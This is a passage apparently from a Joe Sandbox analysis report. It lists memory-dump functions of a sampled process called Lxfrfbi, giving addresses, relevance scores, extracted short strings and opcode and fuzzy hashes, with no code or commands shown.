Uniqueness Score: -1.00%

Function 08174188 Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2256700431.0000000008170000.00000040.00000800.00020000.00000000.sdmp, Offset: 08170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_8170000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae3c1c3bd3610d094e8a04de2df5a17782a34f8c22d137359c76c044ed8f93e6
Instruction ID: 3e1f5d204017cf54841d43fa452387ecf3ed40c3de590fcf4451dcc414c41a20
Opcode Fuzzy Hash: ae3c1c3bd3610d094e8a04de2df5a17782a34f8c22d137359c76c044ed8f93e6
Instruction Fuzzy Hash: 1DC1F278E01218CFDB54EFA9D894BADBBB2FF89301F2080A9D419A7350DB345A81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 08174198 Relevance: .3, Instructions: 256COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2256700431.0000000008170000.00000040.00000800.00020000.00000000.sdmp, Offset: 08170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_8170000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22886b958d6699a38cc229b7c2c73432de401bb54d01af021ef7006b5ee81ffc
Instruction ID: 0d52d7e0e1e9547daccc78e9f46e0c4cb4b3697022f930e6a69dc28c47eac444
Opcode Fuzzy Hash: 22886b958d6699a38cc229b7c2c73432de401bb54d01af021ef7006b5ee81ffc
Instruction Fuzzy Hash: D1B1F174E05218CFEB54EFA9D894BADBBB2FF89301F1080A9D40AA7350DB345A81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 014F278A Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1927765469.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_14f0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc30fb07c44f44fc936b5ae11a90592a04cec00e7dfaaabc6e23a34972937269
Instruction ID: 4e3c4f61601768640c3d40ef8b0373e31aaa6202660f04c1ef4e54bdda7d5b9e
Opcode Fuzzy Hash: dc30fb07c44f44fc936b5ae11a90592a04cec00e7dfaaabc6e23a34972937269
Instruction Fuzzy Hash: D3817036F101168FD714DB69D884E9EB7F3AFC8714F1A8169E40ADB365DA74DC068B80

Uniqueness

Uniqueness Score: -1.00%

Function 014F2837 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1927765469.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_14f0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bdf37c5ad1ac4edba6bcc556fd603a067ee00a843b0b9e6fff14878590ddb4d
Instruction ID: ee25117b2a9cefd553e2ebd4874b8ae3df90e89efe84b5cde309286edfb241d6
Opcode Fuzzy Hash: 0bdf37c5ad1ac4edba6bcc556fd603a067ee00a843b0b9e6fff14878590ddb4d
Instruction Fuzzy Hash: 78612C36F105268FD754DB69C884E5EB7E3AFC8714F1AC169E4099B369DE74EC028B80

Uniqueness

Uniqueness Score: -1.00%

Function 072C9FC1 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2219710588.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_72c0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6634ff066a164e548d824a929240aef7579b3c990cf0d41886d1d45ce64a6842
Instruction ID: e475f39763bad2c6791dbb5e07e70d91c7086417797f1ae9aca257b67c2f074e
Opcode Fuzzy Hash: 6634ff066a164e548d824a929240aef7579b3c990cf0d41886d1d45ce64a6842
Instruction Fuzzy Hash: 2351E6B1E106198BEB18CF6BD94169AFBF7BFC8300F14C1BAD508AB255DB740A818F54

Uniqueness

Uniqueness Score: -1.00%

Function 014F632B Relevance: 2.7, Strings: 2, Instructions: 208COMMON

Download Yara Rule

Strings

Hbq, xrefs: 014F64BF
Te^q, xrefs: 014F65D1

Memory Dump Source

Source File: 0000000C.00000002.1927765469.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_14f0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID: Hbq$Te^q
API String ID: 0-4204034466
Opcode ID: 34d1be138b60b89756d2b054deecd2f6c4a688a586fc4bb8c769423fab135503
Instruction ID: 99bcfa553e18bf674dace83aa9f80b8fe65de0799fffcd76490c963a431be382
Opcode Fuzzy Hash: 34d1be138b60b89756d2b054deecd2f6c4a688a586fc4bb8c769423fab135503
Instruction Fuzzy Hash: A661D130B002468FCB05ABBDC8946AEBBA7EFD4304B56857ED1059B3A5EF34DD068791

Uniqueness

Uniqueness Score: -1.00%

Function 08176575 Relevance: 2.6, Strings: 2, Instructions: 75COMMON

Download Yara Rule

Strings

2, xrefs: 0817696E
0, xrefs: 08176948

Memory Dump Source

Source File: 0000000C.00000002.2256700431.0000000008170000.00000040.00000800.00020000.00000000.sdmp, Offset: 08170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_8170000_Lxfrfbi.jbxd

Similarity

API ID:
String ID: 0$2
API String ID: 0-3793063076
Opcode ID: c49209d1952926cb298047ad1b60453ece2f97c2532d8bd6f04adb52f0aa9f0e
Instruction ID: 15eccad0b13b3122a8072162e075fbb513a9832f82cae092546599d0e2b2ea1b
Opcode Fuzzy Hash: c49209d1952926cb298047ad1b60453ece2f97c2532d8bd6f04adb52f0aa9f0e
Instruction Fuzzy Hash: CD311170905268CFDB64CF65C954BE9BBB2FF46306F0195EAC40AB7250DB304A89CF24

Uniqueness

Uniqueness Score: -1.00%

Function 08175F27 Relevance: 2.6, Strings: 2, Instructions: 75COMMON

Download Yara Rule

Strings

2, xrefs: 0817696E
0, xrefs: 08176948

Memory Dump Source

Source File: 0000000C.00000002.2256700431.0000000008170000.00000040.00000800.00020000.00000000.sdmp, Offset: 08170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_8170000_Lxfrfbi.jbxd

Similarity

API ID:
String ID: 0$2
API String ID: 0-3793063076
Opcode ID: c640feffa6b4e61293c4916ef222ea81ad6989af0fe50918127da1e6c2b509dc
Instruction ID: 4001d0bcd34a9e9c0bba5d4768d5a7220fe89f77d4ee87305d1a4c94818812b6
Opcode Fuzzy Hash: c640feffa6b4e61293c4916ef222ea81ad6989af0fe50918127da1e6c2b509dc
Instruction Fuzzy Hash: 3131DB70901268CFEB64CF64D954BEDBBB6FF49306F0194AAC50AB7240DB354A89CF24

Uniqueness

Uniqueness Score: -1.00%

Function 08175F79 Relevance: 2.6, Strings: 2, Instructions: 58COMMON

Download Yara Rule

Strings

2, xrefs: 0817696E
0, xrefs: 08176948

Memory Dump Source

Source File: 0000000C.00000002.2256700431.0000000008170000.00000040.00000800.00020000.00000000.sdmp, Offset: 08170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_8170000_Lxfrfbi.jbxd

Similarity

API ID:
String ID: 0$2
API String ID: 0-3793063076
Opcode ID: e5bebb267714f17f78e57051df1615c1c95c19afa7a34ad12d49d7fc487fddea
Instruction ID: 85fc96528aaf5d18d70c1e304f0fab4c830aef2178d158a5b55de0f61fca2e3a
Opcode Fuzzy Hash: e5bebb267714f17f78e57051df1615c1c95c19afa7a34ad12d49d7fc487fddea
Instruction Fuzzy Hash: FF211070901218CFEB64CF65C954BE9BBB2FF4A306F01959AC50AB3240D7314A89CF24

Uniqueness

Uniqueness Score: -1.00%

Function 014F11D9 Relevance: 1.4, Strings: 1, Instructions: 154COMMON

Download Yara Rule

Strings

\s^q, xrefs: 014F1361

Memory Dump Source

Source File: 0000000C.00000002.1927765469.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_14f0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID: \s^q
API String ID: 0-4111632511
Opcode ID: dacce681bb8457c4d3dfaf877f368588a8bfdf2c01cb25fc4365863c46f0f77f
Instruction ID: e732e5083c3e940d7402b53daf961430673178d9bc782ed51945370877393176
Opcode Fuzzy Hash: dacce681bb8457c4d3dfaf877f368588a8bfdf2c01cb25fc4365863c46f0f77f
Instruction Fuzzy Hash: 81510AB8D4020ADFDF14DFA9D9806EEBBB1BF88310F10A659D412EB364DB359942CB50

Uniqueness

Uniqueness Score: -1.00%

Function 072CC228 Relevance: 1.4, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

TJcq, xrefs: 072CC2E1

Memory Dump Source

Source File: 0000000C.00000002.2219710588.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_72c0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID: TJcq
API String ID: 0-1911830065
Opcode ID: acd4e451e8f3597bed0a4f8683ec319e297c4e86375b5ee5b4876fdd5dbd9601
Instruction ID: 6c69ec35c22c6335ea6da712dea647d103e873019e2fdf749f5e5aaff682ed08
Opcode Fuzzy Hash: acd4e451e8f3597bed0a4f8683ec319e297c4e86375b5ee5b4876fdd5dbd9601
Instruction Fuzzy Hash: 3C5106B4D11208DFCB04DFA9E588A9DBBF5FF89300F20816AE409A7350DB749985CF65

Uniqueness

Uniqueness Score: -1.00%

Function 072CC222 Relevance: 1.4, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

TJcq, xrefs: 072CC2E1

Memory Dump Source

Source File: 0000000C.00000002.2219710588.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_72c0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID: TJcq
API String ID: 0-1911830065
Opcode ID: 0c5e8d4501cb6db1b5a36f3fa0b561541bf8638dcfa2055324b8b753df014cae
Instruction ID: 58c391d620ee473bf154eed28d87f89397a78e60a046c8165282b2348a99b10d
Opcode Fuzzy Hash: 0c5e8d4501cb6db1b5a36f3fa0b561541bf8638dcfa2055324b8b753df014cae
Instruction Fuzzy Hash: 4C51D6B4D11209DFCB04DFA9E588A9DBBF1FF89300F20816AE505A7350DB789985CF65

Uniqueness

Uniqueness Score: -1.00%

Function 014F2550 Relevance: 1.4, Strings: 1, Instructions: 120COMMON

Download Yara Rule

Strings

, xrefs: 014F2662

Memory Dump Source

Source File: 0000000C.00000002.1927765469.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_14f0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 4e787abe38e0fa4c18b09ffbbc0343b8e6943f23ae055f61da7bc49cc8cc548c
Instruction ID: 21a5e3a10efbd0216ac39f1f906ed17c8ce6cdad85e642b13659045931f6fb6c
Opcode Fuzzy Hash: 4e787abe38e0fa4c18b09ffbbc0343b8e6943f23ae055f61da7bc49cc8cc548c
Instruction Fuzzy Hash: 7F419C71F0011A8BDB10CF9DD8809AFFBB2FB84212F14C92AD619D7718C770E8628B91

Uniqueness

Uniqueness Score: -1.00%

Function 014F8280 Relevance: 1.3, Strings: 1, Instructions: 88COMMON

Download Yara Rule

Strings

<duq, xrefs: 014F8305

Memory Dump Source

Source File: 0000000C.00000002.1927765469.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_14f0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID: <duq
API String ID: 0-2704095200
Opcode ID: 5978c9bf74f0e3f248f15c41a7578a7bd1b1e224dbd921fa5e1d7904a784a17f
Instruction ID: ab3e3d434233418c8752c1a075a08c010114aa16a79929c78b6f3e92bfdd4ab1
Opcode Fuzzy Hash: 5978c9bf74f0e3f248f15c41a7578a7bd1b1e224dbd921fa5e1d7904a784a17f
Instruction Fuzzy Hash: 2131E875A002098FCB05CBA9C5949EEBBF1FF8C210F19849AD509EB361D735EC42CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 014F826F Relevance: 1.3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

<duq, xrefs: 014F8305

Memory Dump Source

Source File: 0000000C.00000002.1927765469.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_14f0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID: <duq
API String ID: 0-2704095200
Opcode ID: 04e418b6b97499df9146d6db68a70681a63da003deb75de4dcd890a60896b300
Instruction ID: e5c074bf64d5c46b387392707daccad5a0bfac8a323cf447e9827ebcde8aae71
Opcode Fuzzy Hash: 04e418b6b97499df9146d6db68a70681a63da003deb75de4dcd890a60896b300
Instruction Fuzzy Hash: ED31A775A002098FCB44DF69C584AAEBBF5FF88314F198599D909EB361D731EC41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 014F0FA8 Relevance: 1.3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

Strings

Te^q, xrefs: 014F0FD7

Memory Dump Source

Source File: 0000000C.00000002.1927765469.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_14f0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 1b942e344808476b5f38df10b059686701498b82209114d06cfaf3836fa2e280
Instruction ID: be1e4d83855d4b1199d5b06b8a2ddfd72cb3e73501b79472eb74a12f4b718cc9
Opcode Fuzzy Hash: 1b942e344808476b5f38df10b059686701498b82209114d06cfaf3836fa2e280
Instruction Fuzzy Hash: AC219C70B00255DFDB24DF6AD884AAEBBF2AF94701F10442EE502EB771CA758C06CB80

Uniqueness

Uniqueness Score: -1.00%

Function 014F0FB8 Relevance: 1.3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

Strings

Te^q, xrefs: 014F0FD7

Memory Dump Source

Source File: 0000000C.00000002.1927765469.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_14f0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: f5c4be53a8839baf64da8f3dfaa9788deae30f09f72c1854a8581261bc5ce30e
Instruction ID: 0d8d518bf4437dd656ede9a767ff076cd11a100a0c1e0461bf78d265449245e1
Opcode Fuzzy Hash: f5c4be53a8839baf64da8f3dfaa9788deae30f09f72c1854a8581261bc5ce30e
Instruction Fuzzy Hash: 84219071B00245DFDB24DF6AD854A6EBEF6AF94600F10442EE502D7371CF319C458B80

Uniqueness

Uniqueness Score: -1.00%

Function 014F26D8 Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

\s^q, xrefs: 014F272F

Memory Dump Source

Source File: 0000000C.00000002.1927765469.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_14f0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID: \s^q
API String ID: 0-4111632511
Opcode ID: e9ab38e9418f154eba1d43a937bcb3352b4f0bfd35e1ae80f9595a13545c6e83
Instruction ID: e99b22c88fa1facb9fcb5a422e140f61145d69afc9f77f380747aa4bce9227d2
Opcode Fuzzy Hash: e9ab38e9418f154eba1d43a937bcb3352b4f0bfd35e1ae80f9595a13545c6e83
Instruction Fuzzy Hash: E7119E713404208FDB68DB7DD854D2A77E9EF88A6471184AEE60ECB371DB71DC428B90

Uniqueness

Uniqueness Score: -1.00%

Function 08176ACA Relevance: 1.3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

Strings

., xrefs: 08176AD4

Memory Dump Source

Source File: 0000000C.00000002.2256700431.0000000008170000.00000040.00000800.00020000.00000000.sdmp, Offset: 08170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_8170000_Lxfrfbi.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 2d3be091a689d487e0789a6506aeac5aa636d0a208d31ffae282c875fe816040
Instruction ID: 0f0dc6768f4a3c4d80037f244cefda5ad316ff6d962de36c580c327ac30a5043
Opcode Fuzzy Hash: 2d3be091a689d487e0789a6506aeac5aa636d0a208d31ffae282c875fe816040
Instruction Fuzzy Hash: B931FF70D01258CFEB64CFA4D944BE8BBB2FB09306F1095AAD509B7280C7B54AC4CF24

Uniqueness

Uniqueness Score: -1.00%

Function 08176D88 Relevance: 1.3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

;, xrefs: 08176DBE

Memory Dump Source

Source File: 0000000C.00000002.2256700431.0000000008170000.00000040.00000800.00020000.00000000.sdmp, Offset: 08170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_8170000_Lxfrfbi.jbxd

Similarity

API ID:
String ID: ;
API String ID: 0-1661535913
Opcode ID: cc2e2f479ef1a9fee4c37b4ade180adc562d2a8dc1abbdcf1a61c0d7ec6cac05
Instruction ID: c53f092df32cbcd356c2a8c4c8cce37030762ce75eb2c790d94e91139a48b3ae
Opcode Fuzzy Hash: cc2e2f479ef1a9fee4c37b4ade180adc562d2a8dc1abbdcf1a61c0d7ec6cac05
Instruction Fuzzy Hash: 2F21FE70801268CEEB64CFA5C808BEDBBB2FB45302F0094DAD50AB6280C7750AC9CF64

Uniqueness

Uniqueness Score: -1.00%

Function 08176C9D Relevance: 1.3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

Strings

<, xrefs: 08176D09

Memory Dump Source

Source File: 0000000C.00000002.2256700431.0000000008170000.00000040.00000800.00020000.00000000.sdmp, Offset: 08170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_8170000_Lxfrfbi.jbxd

Similarity

API ID:
String ID: <
API String ID: 0-4251816714
Opcode ID: e4cc46b6b934004574cbe7269899f05129a1adab22b27de43672b0c9ec10e80d
Instruction ID: ff0cca5679c4dda0e8e75b5da321a34d813a149e767c6c3ba21594c3c66098da
Opcode Fuzzy Hash: e4cc46b6b934004574cbe7269899f05129a1adab22b27de43672b0c9ec10e80d
Instruction Fuzzy Hash: 6821BC74901228CFEB64CF65C948BE9BBB2EB49302F1485DAD509B7290DB754AC9CF24

Uniqueness

Uniqueness Score: -1.00%

Function 081765B7 Relevance: 1.3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

!, xrefs: 08176609

Memory Dump Source

Source File: 0000000C.00000002.2256700431.0000000008170000.00000040.00000800.00020000.00000000.sdmp, Offset: 08170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_8170000_Lxfrfbi.jbxd

Similarity

API ID:
String ID: !
API String ID: 0-2657877971
Opcode ID: 671672f009c55aecb503d652d36f023ebd7aac5814aef86f58779b969b6740db
Instruction ID: 04c8973aeda6fc956ec99b3600947905b1416b77fa25daede769218b54db24b9
Opcode Fuzzy Hash: 671672f009c55aecb503d652d36f023ebd7aac5814aef86f58779b969b6740db
Instruction Fuzzy Hash: 4C213270801259CFEB24CF69C844BE8BBB2FF4A312F0085DAC409B3280C7754A89CF64

Uniqueness

Uniqueness Score: -1.00%

Function 014F1120 Relevance: 1.3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

Strings

8bq, xrefs: 014F1193

Memory Dump Source

Source File: 0000000C.00000002.1927765469.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_14f0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID: 8bq
API String ID: 0-187764589
Opcode ID: bdda6fdf7426a68ddb041dea7af6ea224632df457057d8b040838535f61e85e7
Instruction ID: 6945e18047097e5e04cb332ba862767f16f075857e3952794450b57cf2416add
Opcode Fuzzy Hash: bdda6fdf7426a68ddb041dea7af6ea224632df457057d8b040838535f61e85e7
Instruction Fuzzy Hash: 5B1126393001149FC351E77CE42896A7BE6EFCD22130544BAE20AC737ACB718C028B91

Uniqueness

Uniqueness Score: -1.00%

Function 014F1168 Relevance: 1.3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

Strings

8bq, xrefs: 014F1193

Memory Dump Source

Source File: 0000000C.00000002.1927765469.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_14f0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID: 8bq
API String ID: 0-187764589
Opcode ID: c9ab94757df5953bb950c0912e5e8bd4fb0ff81499955a1833456e12c09249b5
Instruction ID: 0f99478642afe712dac2bce7e215e8423c7ffcd85c2607c5ac4fe5e48e33ef68
Opcode Fuzzy Hash: c9ab94757df5953bb950c0912e5e8bd4fb0ff81499955a1833456e12c09249b5
Instruction Fuzzy Hash: 57F022393402449FC351A7BD901469E77E1EFEE221B9444BAD209C73B6DB308C478B51

Uniqueness

Uniqueness Score: -1.00%

Function 014F26D0 Relevance: 1.3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

Strings

\s^q, xrefs: 014F272F

Memory Dump Source

Source File: 0000000C.00000002.1927765469.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_14f0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID: \s^q
API String ID: 0-4111632511
Opcode ID: 75af91044cee21c2de244757f3328be3325cdfb492f515099ded3d30868582d0
Instruction ID: b51b76c30c2d519e499388c9db3af4e5dd85ea05bfe7e89ffb682f04bf826a9c
Opcode Fuzzy Hash: 75af91044cee21c2de244757f3328be3325cdfb492f515099ded3d30868582d0
Instruction Fuzzy Hash: 790164B43005118FD728DF39D954D2ABBE6EF88A5471184AEE60ACB3B1DB31DC428B50

Uniqueness

Uniqueness Score: -1.00%

Function 081739D8 Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2256700431.0000000008170000.00000040.00000800.00020000.00000000.sdmp, Offset: 08170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_8170000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a46e5b1fbc576943d2b1b4aef23cac3b14ce3ac1d7610cf58ae6e28feda2cd9f
Instruction ID: a1c79ce6ae18f0431c3d65e8fd1aa45d0fea87430a1535d8ffbfab55ef674c79
Opcode Fuzzy Hash: a46e5b1fbc576943d2b1b4aef23cac3b14ce3ac1d7610cf58ae6e28feda2cd9f
Instruction Fuzzy Hash: A5C1EEB4E01218CFDB54EFA8D895B9DBBB2FF89301F5081A9E919A7350DB345D869F00

Uniqueness

Uniqueness Score: -1.00%

Function 081739E8 Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2256700431.0000000008170000.00000040.00000800.00020000.00000000.sdmp, Offset: 08170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_8170000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb2f6267c962e73c4f5c5cb74033c2c038e52379eead5626838258adb9ce5010
Instruction ID: 2a8b9ae423030a06633cf0ba16c7b75a0f19e07aa1b2bd4d062683bcb91732ca
Opcode Fuzzy Hash: bb2f6267c962e73c4f5c5cb74033c2c038e52379eead5626838258adb9ce5010
Instruction Fuzzy Hash: AEC1EEB4E01218CFDB54EF68D895B9DBBB2FF89301F508069E919A7350DB345986DF10

Uniqueness

Uniqueness Score: -1.00%

Function 08173B98 Relevance: .3, Instructions: 255COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2256700431.0000000008170000.00000040.00000800.00020000.00000000.sdmp, Offset: 08170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_8170000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d89e2d24f4d52382efee91ea6dce00b03f8e4b5379a66db096827c1cd93465d3
Instruction ID: b5ee9bd29c08ba56542e0c33f432ebdf8e600e719f8e40c5d43dff927918c35a
Opcode Fuzzy Hash: d89e2d24f4d52382efee91ea6dce00b03f8e4b5379a66db096827c1cd93465d3
Instruction Fuzzy Hash: EDC1CEB4E01218CFDB54EFA8D894B9DBBB2FB89301F5080A9D919A7351DB349D86DF01

Uniqueness

Uniqueness Score: -1.00%

Function 081742C3 Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2256700431.0000000008170000.00000040.00000800.00020000.00000000.sdmp, Offset: 08170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_8170000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c5058481a926b830458b0033babbd754a498816275ff01c0fd9a76769aba1fb
Instruction ID: 3f117627d0e5db96e4ad938670575eda8ac6e33a500419749225df785d5b66a1
Opcode Fuzzy Hash: 8c5058481a926b830458b0033babbd754a498816275ff01c0fd9a76769aba1fb
Instruction Fuzzy Hash: 09B1C074E05218CFDB54EF68D894BADBBB2BF49301F1180A9D40AA7350DB345D81DF55

Uniqueness

Uniqueness Score: -1.00%

Function 08173A5A Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2256700431.0000000008170000.00000040.00000800.00020000.00000000.sdmp, Offset: 08170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_8170000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7aa5e6bd61ab56192f903a77f41318e2edf1c93ed9e5cfc866fb8e59c0cb6a98
Instruction ID: ff595a1a0f52f92e1f3930b8ce81d3fa715e5c34d875bdc2d4f0d114fd418a0c
Opcode Fuzzy Hash: 7aa5e6bd61ab56192f903a77f41318e2edf1c93ed9e5cfc866fb8e59c0cb6a98
Instruction Fuzzy Hash: FCB1EDB4E00218CFDB54EF68D895B9DBBB2FB89301F5081A9E919A7350DB349D82DF01

Uniqueness

Uniqueness Score: -1.00%

Function 081744E3 Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2256700431.0000000008170000.00000040.00000800.00020000.00000000.sdmp, Offset: 08170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_8170000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 449c7c31d698cc30f5ccf998545070ca87d1fcae0796778c09a99f748c49d97c
Instruction ID: ea09908b788d193fe45658e0fb9348c874f78a8b2cd360998b79421ba0eb95a7
Opcode Fuzzy Hash: 449c7c31d698cc30f5ccf998545070ca87d1fcae0796778c09a99f748c49d97c
Instruction Fuzzy Hash: 77B1CE78E05218CFDB54EFA8D894BADBBB2BF49301F2080A9D40AA7350DB345E81DF55

Uniqueness

Uniqueness Score: -1.00%

Function 072CCEF0 Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2219710588.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_72c0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d1b7eb484a2a80602d7d16625aaf894d050fe7849ebceb75e0d3656603ca844
Instruction ID: f09469242a0f6bc9d308c7e3040b8326148317033d5a0dc95de3d1cb41ecb2d4
Opcode Fuzzy Hash: 3d1b7eb484a2a80602d7d16625aaf894d050fe7849ebceb75e0d3656603ca844
Instruction Fuzzy Hash: 069141B0D25209CFDB14CFA9C4687EDBBF5EB59300F10816BD50AB7240D7B94A89CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 014F07F4 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1927765469.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_14f0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe94d7f3e95e037dc5df4cd3fb9f94fefdd6491b8678774766b54bd86840a7ee
Instruction ID: e179080f8c5c7dac269dceb4de1812be047a0e348b71d7525c25ed1a08eb9977
Opcode Fuzzy Hash: fe94d7f3e95e037dc5df4cd3fb9f94fefdd6491b8678774766b54bd86840a7ee
Instruction Fuzzy Hash: 6841C160B042854FCB15AB7D886456F7FEAEFA5201715486FE505CB391DE388D0687A1

Uniqueness

Uniqueness Score: -1.00%

Function 081776AB Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2256700431.0000000008170000.00000040.00000800.00020000.00000000.sdmp, Offset: 08170000, based on PE: false

